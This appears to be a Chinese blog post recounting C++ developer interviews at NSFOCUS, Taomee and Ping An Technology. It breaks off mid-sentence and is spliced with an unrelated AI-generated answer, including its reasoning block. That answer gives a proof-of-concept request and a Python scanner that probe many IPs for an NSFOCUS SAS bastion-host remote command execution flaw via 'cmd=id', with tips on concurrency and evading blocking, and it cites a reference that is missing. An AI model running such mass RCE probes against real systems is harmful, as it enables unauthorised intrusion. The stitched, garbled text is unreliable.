秋招面试总结绿盟、淘米、平安科技等(c++开发工程师)

本文是作者关于秋招面试经历的总结,主要涉及C++开发工程师的面试经验,包括绿盟、淘米、平安科技的面试题目和流程。面试内容涵盖C++基础知识、数据结构、计算机网络、操作系统等方面,同时分享了面试技巧和建议。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

先简单的进行一个自我介绍吧:学历:普通一本   专业:网络工程    注:CET4未通过(很难受),BATJ美团,滴滴一线都没投,感觉实力不够   

下面的一些知识点我面试的公司基本都有问到,大神的话请绕道!!!

绿盟c++开发:我第一家面的公司,我笔试完后绿盟发邮件和短信通知我去第二天早上9:00去面试,面试官拿着简历让我进行自我介绍(自我介绍一般三分钟左右吧让面试官看完你的简历),首先对我简历上在校获奖情况还有参加的一些比赛的内容进行简单询问,第一个问我的是进程的内存空间(栈、堆、静态存储区、代码存储区),然后问我平时用的c++多还是c多,再问了我gcc和g++调试工具,我用的是gdb(因为平时调试用的比较少所有没回答好),再一个就是TCP/IP的三次握手四次挥手,网络编程的一些接口(socket/bind/connect/accept/listen),由于我简历上写的了解RSA加密算法,我给他简单介绍了一下RSA,然后他问我RSA加密工具,我没回答上来,然后就是项目了。由于是第一次面试表现的有点紧张,但是面试官人很好的,问的其实不难只是当时我好多都忘了。

平安科技运维工程师:面试的时候我其实不是很想去,因为我当时竟然投的运维,笔试还竟然过了72分,面试地点在兰溪大酒店,当时预约的是下午4点结果我迟到了10分钟排队排了一个小时,面试属于叫号的那种,我去的面试的时候面试官看着我的简历问我编程是不是很牛逼要不要给我转开发岗立刻就让我去面开放的那种,我说算了吧我试试运维,结果面试官还一直说我要是想去面开发他给我推荐。面试官就问了三个问题:1.给了一张图大概就是两个局域网ping不同的原因有哪些,因为我是网络专业,还是比较简单的但是我发现我说完面试官对我的回答不满意,然后让我介绍一下几个路由协议我说了OSPF,两个协议并简单介绍了一下,然后再问我路由器的工作过程,再就是问我Linux查看网络状态的命令,最后问了我一个我从来没听过也没见过的linux命令,其实我感觉我回答还可以但是面试完他说你要不要去面试开发我给你推荐,我说算了吧。

其他的公司大部分都大同小异:一面基础面c++、数据结构、计算机网络 、操作系统

c++:多态、虚

<think>好的,我需要帮用户解决关于绿盟产品批量验证的使用方法和教程的问题。首先,我得查看用户提供的引用内容,特别是引用[3],里面提到了绿盟SAS堡垒机的远程命令执行漏洞和批量验证POC的使用方法。用户可能想知道如何利用绿盟的工具或产品进行类似的批量验证操作。 首先,我需要确认绿盟是否有官方的批量验证工具或功能。根据引用[3],用户可能已经有一个POC脚本,但需要指导如何使用。通常,批量验证可能涉及编写脚本来自动化测试多个目标,比如使用Python或者其他自动化工具。 接下来,我需要考虑绿盟产品的具体文档或指南。用户可能需要参考绿盟的官方文档,或者寻找社区提供的教程。引用[3]中的POC示例使用了Tscan验证工具,这可能是一个自定义脚本或工具。用户可能需要了解如何配置参数、路径、请求头等。 另外,用户可能需要了解绿盟SAS堡垒机的配置步骤,比如如何设置Exec路径和处理响应。例如,在引用[3]的POC中,路径是/webconf/Exec/index?cmd=id,请求方法为GET,并且检查响应状态和内容。用户需要确保他们的脚本能够正确发送请求并解析结果。 同时,安全测试需要权限,用户必须确保他们有权对目标系统进行测试,避免未经授权的访问。此外,绿盟可能提供了一些安全工具或API,用户需要查阅相关文档来集成批量验证功能。 最后,我应该建议用户参考绿盟的官方支持或社区论坛,以获取最新的工具和教程。如果有具体的产品名称,如绿盟SAS堡垒机,应指导用户查找该产品的用户手册或安全指南中的批量验证部分。</think>关于绿盟产品批量验证的使用方法,根据提供的漏洞验证案例[^3],以下是分步骤说明: 1. **准备工作环境** - 安装Python环境(建议3.6+版本) - 配置Tscan等漏洞验证工具 - 准备目标IP列表文件(如`targets.txt`) 2. **解析POC验证模板**(以绿盟SAS堡垒机漏洞为例) ```yaml rules: method: GET path: /webconf/Exec/index?cmd=id # 关键漏洞触发路径 headers: Content-Type: application/x-www-form-urlencoded expression: response.status == 200 && response.body.contains("WEBSVC OK") # 漏洞特征判断 ``` 3. **构建批量验证脚本框架** ```python import requests def check_vuln(ip): try: url = f"http://{ip}/webconf/Exec/index?cmd=id" response = requests.get(url, timeout=5) if response.status_code == 200 and "WEBSVC OK" in response.text: return True except Exception as e: return False return False ``` 4. **实施批量验证** - 遍历IP列表文件 - 多线程加速检测(建议控制并发量) - 输出存在漏洞的目标列表 **注意事项**: - 必须获得合法授权后才可进行验证[^3] - 绿盟产品存在防护机制,高频请求可能触发封禁 - 验证前建议在隔离环境测试
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值